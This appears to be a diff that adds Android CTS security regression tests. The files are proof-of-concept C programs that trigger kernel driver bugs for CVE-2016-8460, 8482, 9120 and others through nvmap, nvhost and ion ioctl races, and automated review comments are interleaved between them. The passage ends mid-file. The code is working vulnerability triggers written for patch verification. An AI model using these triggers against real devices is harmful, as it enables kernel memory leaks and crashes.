+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ ERR("[-] create close thread %d failed", i);
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ LOG("[+] %03d times", i);
+ /* open */
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+ //usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
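Review bot: In `main`, a failed `pthread_create` is reported through `ERR`, which prints `errno`, but `pthread_create` returns its error code and does not set `errno`, so the message can show an unrelated value; print the return value instead, e.g. `LOG("[-] create close thread %d failed: %d(%s)", i, ret, strerror(ret));`. `main` also returns 0 both when `open(DEV, O_RDONLY)` fails and after a full run, so the exit status cannot tell a skipped test from a completed one; a distinct non-zero return on the open-failure path would make that explicit, provided the host-side test does not depend on the current value. `attack` and `target_fd` are shared between threads as `volatile int`, which gives no ordering guarantee; a C11 atomic or a mutex is the portable way to publish the stop flag. `o_args.channel_fd` is a `__u32` printed with `%d`; `%u` matches the type.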
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
new file mode 100644
index 0000000..b9c51d1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8460
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS := -Wall -W -g -O2 -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
new file mode 100755
index 0000000..78d41e5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_pin_handle {
+ __u32 *handles; /* array of handles to pin/unpin */
+ unsigned long *addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_pin_handle_32 {
+ __u32 handles; /* array of handles to pin/unpin */
+ __u32 addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_map_caller_32 {
+ __u32 handle; /* nvmap handle */
+ __u32 offset; /* offset into hmem; should be page-aligned */
+ __u32 length; /* number of bytes to map */
+ __u32 flags; /* maps as wb/iwb etc. */
+ __u32 addr; /* user pointer*/
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PIN_MULT _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_PIN_MULT_32 _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32)
+#define NVMAP_IOC_MMAP_32 _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+
+int g_fd = -1;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ return g_fd;
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ int i;
+ int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(handles, 0x42, 0x1000);
+ for (i = 0; i < 2; ++i) {
+ struct nvmap_create_handle op = {0};
+ op.size = 0x1000;
+ ioctl(g_fd, NVMAP_IOC_CREATE, &op);
+ handles[i] = op.handle;
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.handle = op.handle;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+ }
+
+ void* leak_addr = (void*) 0x10001000;
+ void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(leak_addr, 0x41, 0x1000);
+
+ unsigned long leaked_data = 0;
+ struct nvmap_pin_handle_32 pin = {0};
+ pin.count = 2;
+ pin.handles = (unsigned int) handles;
+ struct nvmap_pin_handle err_pin = {0};
+ err_pin.count = 0;
+ err_pin.handles = handles;
+ err_pin.addr = leak_addr + 8;
+
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin); // construct op.addr
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin);
+
+ for (i = 0; i < 10; ++i) {
+ if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) {
+ leaked_data = (unsigned long)((int*)leak_addr) + i;
+ }
+ }
+
+ if (leaked_data) {
+ printf("Vulnerable");
+ }
+ return 0;
+}
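Review bot: Neither `mmap` call in `main` is checked against `MAP_FAILED`, and the return values of the `NVMAP_IOC_CREATE` and `NVMAP_IOC_ALLOC` ioctls are ignored, so a failed setup either faults in the following `memset` or can fall through to `return 0` without printing anything, which the host side cannot distinguish from a patched device. Add `if (handles == MAP_FAILED) return -1;` after the first mapping, compare `mmap_addr` (currently unused) with `MAP_FAILED` after the second, and return non-zero when an ioctl returns -1. `NVMAP_HEAP_CARVEOUT_MASK` expands to `NVMAP_HEAP_IOVMM`, which this file never defines; it compiles only because the macro is unused. `leak_addr + 8` is arithmetic on `void *`, a GNU extension, so cast to `char *` first, and `printf("Vulnerable")` has no trailing newline, which matters if the output is matched line by line.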
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
new file mode 100644
index 0000000..b41fb16
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8482
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
new file mode 100644
index 0000000..41862a5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
@@ -0,0 +1,205 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+#define NVHOST_IOCTL_MAGIC 'H'
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%d\n", errno, errno);
+ }
+ return ret;
+}
+
+struct nvhost_submit_args {
+ __u32 submit_version;
+ __u32 num_syncpt_incrs;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 timeout;
+ __u32 flags;
+ __u32 fence; /* Return value */
+ __u64 syncpt_incrs;
+ __u64 cmdbuf_exts;
+
+ __u64 pad[3]; /* future expansion */
+
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 reloc_shifts;
+ __u64 waitchks;
+ __u64 waitbases;
+ __u64 class_ids;
+ __u64 fences;
+};
+#define NVHOST_IOCTL_CHANNEL_SUBMIT \
+ _IOWR(NVHOST_IOCTL_MAGIC, 26, struct nvhost_submit_args)
+
+struct nvhost_syncpt_incr {
+ __u32 syncpt_id;
+ __u32 syncpt_incrs;
+};
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define VICDEV "/dev/nvhost-vic"
+#define SYNC_NUM 1
+struct nvhost_set_error_notifier err1 = { 0 }, err2 = { 0 };
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, vic;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ int ret;
+ set_affinity(1);
+
+ while(attack){
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &err1);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvmap_alloc_handle alloc = {
+ .heap_mask = 0xFFFFFFFF
+ };
+
+ struct nvhost_syncpt_incr incr[SYNC_NUM];
+
+ struct nvhost_submit_args submit = {
+ .num_syncpt_incrs = SYNC_NUM,
+ .syncpt_incrs = (intptr_t)incr,
+ .timeout = 1,
+ //.class_ids = (intptr_t)&ret
+ };
+
+ memset(incr, 0, sizeof(incr));
+ incr[0].syncpt_id = 6;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1)
+ ERR("[-] open %s failed", NVMAPDEV);
+ else
+ LOG("[+] open %s OK", NVMAPDEV);
+
+ vic = open(VICDEV, O_RDONLY);
+ if(vic == -1)
+ ERR("[-] open %s failed", VICDEV);
+ else
+ LOG("[+] open %s OK", VICDEV);
+
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_CREATE failed");
+ else
+ LOG("[+] NVMAP_IOC_CREATE succeeded, fd = %d", args.handle);
+
+ dma1 = args.handle;
+ err1.mem = dma1;
+ alloc.handle = dma1;
+
+ ret = ioctl(nvmap, NVMAP_IOC_ALLOC, &alloc);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_ALLOC failed");
+ else
+ LOG("[+] NVMAP_IOC_ALLOC succeeded");
+
+ /* create close thread */
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ }
+ LOG("[+] running...");
+ while(1) {
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SUBMIT, &submit);
+ }
+
+ LOG("[-] passed :(");
+ attack = 0;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++) {
+ pthread_join(close_thread_id[i], NULL);
+ }
+
+ return 0;
+}
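Review bot: The `while(1)` around `NVHOST_IOCTL_CHANNEL_SUBMIT` in `main` has no exit, so `LOG("[-] passed :(")`, `attack = 0` and the `pthread_join` loop after it are unreachable and the binary never terminates on its own; the outcome then depends on an external timeout. Bound the loop, e.g. `for (j = 0; j < MAX_SUBMITS; j++)`, where `MAX_SUBMITS` is a placeholder for a constant chosen for this test (`j` is already declared but unused, and `TRY_TIMES` is defined but unused). The `open` failures for `NVMAPDEV` and `VICDEV` are only logged, so the later ioctls run on descriptor -1; return early there instead. The `ERR` macro prints `errno` twice (`%d(%d)`), whereas the CVE-2016-8449 PoC in this commit uses `strerror(errno)` for the second field.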
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
new file mode 100644
index 0000000..95ddb3d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-9120
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
new file mode 100644
index 0000000..c03ee45
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
@@ -0,0 +1,175 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+typedef int ion_user_handle_t;
+
+enum ion_heap_type {
+ ION_HEAP_TYPE_SYSTEM,
+ ION_HEAP_TYPE_SYSTEM_CONTIG,
+ ION_HEAP_TYPE_CARVEOUT,
+ ION_HEAP_TYPE_CHUNK,
+ ION_HEAP_TYPE_DMA,
+ ION_HEAP_TYPE_CUSTOM, /* must be last so device specific heaps always
+ are at the end of this enum */
+ ION_NUM_HEAPS = 16,
+};
+
+#define ION_HEAP_SYSTEM_MASK (1 << ION_HEAP_TYPE_SYSTEM)
+#define ION_HEAP_SYSTEM_CONTIG_MASK (1 << ION_HEAP_TYPE_SYSTEM_CONTIG)
+#define ION_HEAP_CARVEOUT_MASK (1 << ION_HEAP_TYPE_CARVEOUT)
+#define ION_HEAP_TYPE_DMA_MASK (1 << ION_HEAP_TYPE_DMA)
+
+#define ION_NUM_HEAP_IDS sizeof(unsigned int) * 8
+
+struct ion_allocation_data {
+ size_t len;
+ size_t align;
+ unsigned int heap_id_mask;
+ unsigned int flags;
+ ion_user_handle_t handle;
+};
+
+
+struct ion_fd_data {
+ ion_user_handle_t handle;
+ int fd;
+};
+
+
+struct ion_handle_data {
+ ion_user_handle_t handle;
+};
+
+
+struct ion_custom_data {
+ unsigned int cmd;
+ unsigned long arg;
+};
+#define ION_IOC_MAGIC 'I'
+
+#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \
+ struct ion_allocation_data)
+
+#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
+
+
+#define ION_FLAG_CACHED 1 /* mappings of this buffer should be
+ cached, ion will do cache
+ maintenance when the buffer is
+ mapped for dma */
+#define ION_FLAG_CACHED_NEEDS_SYNC 2 /* mappings of this buffer will created
+ at mmap time, if this is set
+ caches must be managed manually */
+
+int g_fd = -1;
+struct ion_allocation_data* g_allocation = NULL;
+struct ion_handle_data g_free_data;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+int open_driver() {
+ char* dev_path = "/dev/ion";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void prepare_data() {
+ void* data = malloc(0x1000);
+
+ g_allocation = (struct ion_allocation_data*)data;
+
+ g_allocation->len = 0x1000;
+ g_allocation->align = 8;
+ g_allocation->heap_id_mask = 1 << 25;
+ g_allocation->flags = ION_FLAG_CACHED;
+ g_allocation->handle = -1;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+
+ g_free_data.handle = 1;
+}
+
+void trigger_ion_alloc() {
+ ioctl(g_fd, ION_IOC_ALLOC, g_allocation);
+}
+
+void trigger_ion_free() {
+ ioctl(g_fd, ION_IOC_FREE, &g_free_data);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ while (1) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ trigger_ion_free();
+ pthread_mutex_unlock(&mutex);
+ }
+
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+ setup_privi_and_affinity(0, 1);
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ pthread_cond_signal(&cond);
+ usleep(100);
+ trigger_ion_alloc();
+ sleep(1);
+ }
+
+ return 0;
+}
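Review bot: `prepare_data` calls `mprotect` on a buffer obtained from `malloc(0x1000)`, but `mprotect` requires a page-aligned address and `malloc` does not guarantee one, so the call can fail with `EINVAL` and leave the buffer's protection unchanged, in which case the test no longer runs under the condition it tries to set up. The return value is not checked and `errno` is printed unconditionally, so a stale value may be logged as if it came from `mprotect`. Allocate the page with `mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)` (or `posix_memalign`), check it, and log `errno` only when `mprotect` returns -1. `main` and `race_thread` both loop forever, so the run relies on an external timeout, and the empty `if` body in `setup_privi_and_affinity` silently drops a `sched_setaffinity` failure.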
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
new file mode 100644
index 0000000..cb31e4d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0403
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
new file mode 100644
index 0000000..51095e7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
@@ -0,0 +1,233 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+//overwrite object+0x20,like a list initilize
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+
+
+struct perf_event_attr {
+
+ /*
+ * Major type: hardware/software/tracepoint/etc.
+ */
+ __u32 type;
+
+ /*
+ * Size of the attr structure, for fwd/bwd compat.
+ */
+ __u32 size;
+
+ /*
